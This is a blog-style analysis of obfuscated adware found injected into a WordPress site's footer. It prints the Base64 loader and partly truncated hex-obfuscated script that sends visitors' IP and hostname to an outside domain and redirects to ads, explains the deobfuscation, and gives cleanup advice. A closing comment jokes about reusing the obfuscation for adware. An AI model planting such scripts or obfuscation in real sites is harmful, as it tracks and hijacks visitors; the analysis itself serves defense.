Unraveling the Cryptic Adware in a WordPress Site: A Journey into JavaScript Obfuscation

Introduction

The story began when I was asked to troubleshoot a client's WordPress website that was acting a bit weird. Pop-ups, sluggish behavior, you name it. Being familiar with a bit of grey hat tactics and having an instinctive sense of "code smell," I stumbled upon a mysterious piece of JavaScript code in the site's footer.

The Mysterious Code

Here's the initial snippet:

<script>document.write(atob("PHNjcmlwdD52YXIgXzB4OTJmYj1bIlx4NDRceDRGXHg0RFx4NDNceDZGXHg2RVx4NzRceDY1XHg2RVx4NzRceDRDXHg2Rlx4NjFceDY0XHg2NVx4NjQiLCJceDY4XHg2Rlx4NzNceDc0XHg2RVx4NjFceDZEXHg2NSIsIlx..."));</script>

Base64 encoding and document.write() in a place where it doesn't belong? That's already suspicious enough.

First Level Decryption

After decoding the Base64 string, I got yet another script:

<script>
  var _$_bf30 = [
    "\x2E",
    "\x2D",
    "\x72\x65\x70\x6C\x61\x63\x65\x41\x6C\x6C",
    "\x69\x70",
    "\x3A",
    "\x68\x6F\x73\x74\x6E\x61\x6D\x65",
    "\x6C\x6F\x63\x61\x74\x69\x6F\x6E",
    "",
    ...
  ];
  (function (_0xD070) {
    fetch(_$_bf30[21])
      [_$_bf30[15]]((_0xD0C7) => _0xD0C7[_$_bf30[16]]())
      [_$_bf30[15]]((_0xD175) => {
        _0xD175 = _0xD175[_$_bf30[3]][_$_bf30[2]](_$_bf30[0], _$_bf30[1]);
        _0xD175 = _0xD175[_$_bf30[2]](_$_bf30[4], _$_bf30[1]);
        let _0xD11E = window[_$_bf30[6]][_$_bf30[5]];
        if (_0xD11E == _$_bf30[7]) {
          _0xD11E = _$_bf30[8];
        }
        fetch(
          _$_bf30[17] +
            _0xD11E +
            _$_bf30[0] +
            _0xD175 +
            _$_bf30[0] +
            Math[_$_bf30[19]](Math[_$_bf30[18]]() * 1024 * 1024 * 10) +
            _$_bf30[20]
        )
          [_$_bf30[15]]((_0xD0C7) => _0xD0C7[_$_bf30[16]]())
          [_$_bf30[15]]((_0xD1CC) => {
              ...
            window[_$_bf30[6]][_$_bf30[14]](_0xD223);
          });
      });
  })();
</script>

It was wrapped in layers of obfuscation, clearly trying to hide its real intent.

Unpacking the Hexadecimal Strings

The code had an array of hexadecimal strings that got translated into keywords, which were then used in the script:

var _$_bf30 = [
    ".",
    "-",
    "replaceAll",
    "ip",
    ":",
    "hostname",
    "location",
    "",
    "unk.com",
    "Answer",
    ...
];

Understanding the Deobfuscated Code

Upon translating the array and reading through the de-obfuscated JavaScript, the script seems to be doing the following:

1. Fetch IP using an external API (https://api64.ipify.org?format=json)
2. If hostname is empty, set it to a default ("unk.com" in this case)
3. Use the IP and hostname to make another fetch to a suspicious domain.
4. Unpack the previous fetch to get the ad URL and redirect the page to it.

Security Risks

1. Data Leakage: The script logs the IP and hostname which could be a potential privacy invasion.
2. Performance Impact: Unnecessary HTTP fetch requests are made, which can slow down the website.
3. Potential Malware: The final atob()-decoded string could be anything and could serve malicious content to the user.

How to Handle Such Cases?

1. Immediate Deactivation: The plugin or theme responsible should be immediately deactivated.
2. Security Scan: Perform a full website scan with security plugins like Wordfence or Sucuri.
3. Update and Patch: Ensure that all plugins, themes, and WordPress itself are legally purchased and owned, as well as up to date.
4. Code Review: If you've added custom snippets, review the code or get it reviewed.
5. Monitor: Keep an eye on the server logs for any abnormal activities.
6. Client Communication: Keep your client in the loop throughout the process and advise them on the best security practices moving forward.

Conclusion

While the world of coding offers endless possibilities for creativity and innovation, it also harbors the potential for misuse. What I unraveled in that client's WordPress site is just the tip of the iceberg. With malicious actors becoming increasingly sophisticated, it's not enough to merely fix the issue at hand. We have to be proactive, not reactive.

Key Takeaways:

1. Be Skeptical: If something seems off, it probably is. Listen to that gut feeling.
2. Be Prepared: Always keep your software updated and invest in reliable security plugins.
3. Educate: Make sure you and your clients are well-informed about the risks and how to mitigate them.

Remember, the safety of your web environment doesn't rest in the hands of some remote security expert; it starts with you. Don't be the weakest link. Stay alert, stay updated, and most importantly, stay safe.

Comments

[MahmoudThePeltist]

Great work! I'm going to start applying some of these obfuscation methods to my adware :)